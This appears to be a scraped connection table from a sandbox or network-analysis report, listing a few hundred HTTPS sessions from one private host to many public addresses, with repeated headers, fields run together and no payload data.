                                            17237192.168.2.2346908152.242.253.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17238192.168.2.236009060.64.62.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17239192.168.2.2360424150.16.54.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17240192.168.2.2340576148.192.180.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17241192.168.2.235421286.28.181.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17242192.168.2.235039279.253.140.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17243192.168.2.235921643.88.235.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17244192.168.2.2339768182.1.248.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17245192.168.2.233984425.206.140.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17246192.168.2.2336166168.108.185.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17247192.168.2.234054283.78.117.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17248192.168.2.2352070121.161.29.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17249192.168.2.2352118158.182.147.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17250192.168.2.2348462160.31.132.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17251192.168.2.235747286.5.241.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17252192.168.2.235800231.163.77.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17253192.168.2.235361099.55.103.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17254192.168.2.2332816108.159.11.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17255192.168.2.233366639.101.64.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17256192.168.2.236001240.158.27.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17257192.168.2.233540637.227.93.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17258192.168.2.2338464180.129.232.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17259192.168.2.2353716188.71.240.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17260192.168.2.2355960173.180.182.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17261192.168.2.2340298162.99.21.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17262192.168.2.2359878171.15.125.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17263192.168.2.233849076.29.48.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17264192.168.2.2353576109.150.89.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17265192.168.2.2359200144.252.135.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17266192.168.2.2344942153.179.151.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17267192.168.2.2335258201.34.170.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17268192.168.2.2340456174.200.210.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17269192.168.2.2356462160.254.46.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17270192.168.2.233347272.107.23.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17271192.168.2.2340164170.18.254.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17272192.168.2.2355302179.30.33.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17273192.168.2.2337744190.76.67.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17274192.168.2.2351628133.0.148.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17275192.168.2.235606896.18.243.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17276192.168.2.2351762210.26.229.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17277192.168.2.234665898.89.83.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17278192.168.2.2343530177.81.253.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17279192.168.2.233292694.219.167.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17280192.168.2.2358520194.97.86.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17281192.168.2.235128677.242.124.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17282192.168.2.234178496.203.7.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17283192.168.2.234884043.213.38.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17284192.168.2.23428541.157.127.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17285192.168.2.2332822192.178.113.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17286192.168.2.2355984222.57.234.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17287192.168.2.233297691.73.54.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17288192.168.2.233811213.237.61.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17289192.168.2.2358252133.191.217.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17290192.168.2.234529266.151.18.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17291192.168.2.2350080148.63.21.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17292192.168.2.235979898.25.237.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17293192.168.2.2351996218.168.27.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17294192.168.2.2337284203.2.3.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17295192.168.2.2358232157.9.69.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17296192.168.2.234984897.78.90.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17297192.168.2.2334052135.59.182.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17298192.168.2.2352714117.118.93.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17299192.168.2.2341746198.130.25.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17300192.168.2.235760686.75.50.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17301192.168.2.2349514192.41.0.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17302192.168.2.2341762186.175.28.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17303192.168.2.2336266143.77.231.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17304192.168.2.2336722122.186.21.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17305192.168.2.235535437.178.180.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17306192.168.2.234411846.238.235.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17307192.168.2.2354870121.124.61.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17308192.168.2.2350514109.139.22.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17309192.168.2.2334958193.88.235.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17310192.168.2.2341458178.56.71.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17311192.168.2.2343004206.154.53.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17312192.168.2.2357832150.246.162.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17313192.168.2.2357296208.72.69.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17314192.168.2.2336114174.111.126.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17315192.168.2.23418905.227.77.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17316192.168.2.233730446.243.193.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17317192.168.2.233916677.19.204.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17318192.168.2.235673613.152.76.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17319192.168.2.2356476120.83.108.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17320192.168.2.235898823.160.67.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17321192.168.2.234030893.170.62.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17322192.168.2.2340758133.0.63.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17323192.168.2.2350048170.195.227.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17324192.168.2.2348224150.233.102.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17325192.168.2.2340950170.53.11.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17326192.168.2.233293838.40.163.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17327192.168.2.2357572200.212.30.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17328192.168.2.235852214.180.208.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17329192.168.2.235279832.38.191.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17330192.168.2.2358610104.86.133.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17331192.168.2.2345180113.238.82.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17332192.168.2.2357838160.202.69.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17333192.168.2.234909037.115.222.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17334192.168.2.233380244.105.172.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17335192.168.2.2344904168.164.177.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17336192.168.2.235094878.241.245.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17337192.168.2.2334326210.141.129.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17338192.168.2.2356034192.105.207.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17339192.168.2.233721039.22.23.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17340192.168.2.234720261.201.145.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17341192.168.2.2352080196.188.133.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17342192.168.2.2342974221.170.146.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17343192.168.2.2341694148.192.154.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17344192.168.2.234878478.240.253.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17345192.168.2.2345540123.105.182.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17346192.168.2.234944253.176.204.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17347192.168.2.235940069.148.3.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17348192.168.2.2348012217.243.175.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17349192.168.2.234082273.243.202.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17350192.168.2.235849220.42.231.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17351192.168.2.2342006211.10.91.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17352192.168.2.235031487.161.171.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17353192.168.2.235106862.171.160.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17354192.168.2.2343574187.234.157.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17355192.168.2.236031220.130.157.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17356192.168.2.2357838203.243.18.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17357192.168.2.235488848.110.147.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17358192.168.2.235607470.99.48.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17359192.168.2.234446625.104.81.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17360192.168.2.2360824208.1.141.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17361192.168.2.2351874138.119.44.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17362192.168.2.235846697.80.69.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17363192.168.2.234773466.55.112.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17364192.168.2.2333156203.221.113.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17365192.168.2.2336720149.21.143.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17366192.168.2.234532862.26.193.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17367192.168.2.2350102134.135.110.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17368192.168.2.2355452213.230.75.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17369192.168.2.234890876.35.75.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17370192.168.2.235260073.194.11.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17371192.168.2.2347506144.158.63.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17372192.168.2.2350902164.92.7.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17373192.168.2.2346956222.13.200.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17374192.168.2.235824823.244.201.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17375192.168.2.2342362179.205.226.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17376192.168.2.2333050162.44.91.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17377192.168.2.234161674.245.161.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17378192.168.2.2339338117.61.208.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17379192.168.2.2354698101.5.39.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17380192.168.2.2336644160.88.119.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17381192.168.2.2346204182.211.108.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17382192.168.2.236067245.137.77.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17383192.168.2.233981889.55.223.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17384192.168.2.235458688.154.16.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17385192.168.2.2353384193.98.78.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17386192.168.2.234107493.131.113.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17387192.168.2.235170463.142.155.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17388192.168.2.2360300139.69.83.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17389192.168.2.234860224.242.69.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17390192.168.2.2356400183.199.80.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17391192.168.2.2352926192.50.60.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17392192.168.2.236022076.192.95.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17393192.168.2.2355366172.125.226.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17394192.168.2.235524090.87.211.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17395192.168.2.2352118158.173.9.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17396192.168.2.234847676.117.142.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17397192.168.2.2351864195.174.223.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17398192.168.2.2343862180.21.181.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17399192.168.2.2344192125.112.199.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17400192.168.2.234790413.121.166.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17401192.168.2.2359404202.142.94.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17402192.168.2.2360054138.183.41.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17403192.168.2.233452684.133.157.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17404192.168.2.23564982.82.170.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17405192.168.2.234624289.82.140.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17406192.168.2.23497049.224.148.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17407192.168.2.235266450.38.172.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17408192.168.2.235268292.96.64.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17409192.168.2.235382236.123.168.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17410192.168.2.2354414109.22.89.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17411192.168.2.2353036126.201.100.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17412192.168.2.236055667.157.154.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17413192.168.2.2338062186.65.152.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17414192.168.2.233893664.203.168.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17415192.168.2.2351746186.89.48.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17416192.168.2.233353223.152.121.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17417192.168.2.235323663.147.157.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17418192.168.2.234179066.43.211.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17419192.168.2.2347978178.232.114.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17420192.168.2.2356180102.163.216.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17421192.168.2.2337794203.112.122.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17422192.168.2.2349302109.131.4.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17423192.168.2.234830695.211.180.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17424192.168.2.2345882204.80.133.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17425192.168.2.2351714164.204.160.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17426192.168.2.234188271.215.184.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17427192.168.2.235221639.57.211.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17428192.168.2.2346848221.189.63.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17429192.168.2.2349916211.230.192.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17430192.168.2.235831231.233.92.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17431192.168.2.2357350108.54.42.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17432192.168.2.2335062195.162.29.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17433192.168.2.2353158205.88.60.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17434192.168.2.2346438223.154.18.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17435192.168.2.2355376200.171.146.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17436192.168.2.2355924156.202.163.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17437192.168.2.2348636110.139.221.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17438192.168.2.2350324108.143.97.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17439192.168.2.2340684115.169.201.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17440192.168.2.2335810202.243.17.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17441192.168.2.2358788161.168.61.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17442192.168.2.2333964104.84.99.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17443192.168.2.2345166203.0.14.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17444192.168.2.233838275.11.110.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17445192.168.2.234601825.142.114.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17446192.168.2.2337940136.42.6.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17447192.168.2.2335592166.77.149.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17448192.168.2.234413271.116.131.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17449192.168.2.2340830163.143.34.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17450192.168.2.234963294.227.245.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17451192.168.2.234258270.77.227.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17452192.168.2.2344140131.29.58.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17453192.168.2.235455444.7.223.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17454192.168.2.234169023.1.199.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17455192.168.2.235181678.12.66.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17456192.168.2.2338100109.94.116.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17457192.168.2.2337574119.156.55.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17458192.168.2.2352860125.36.27.247443
                                            TimestampBytes transferredDirectionData


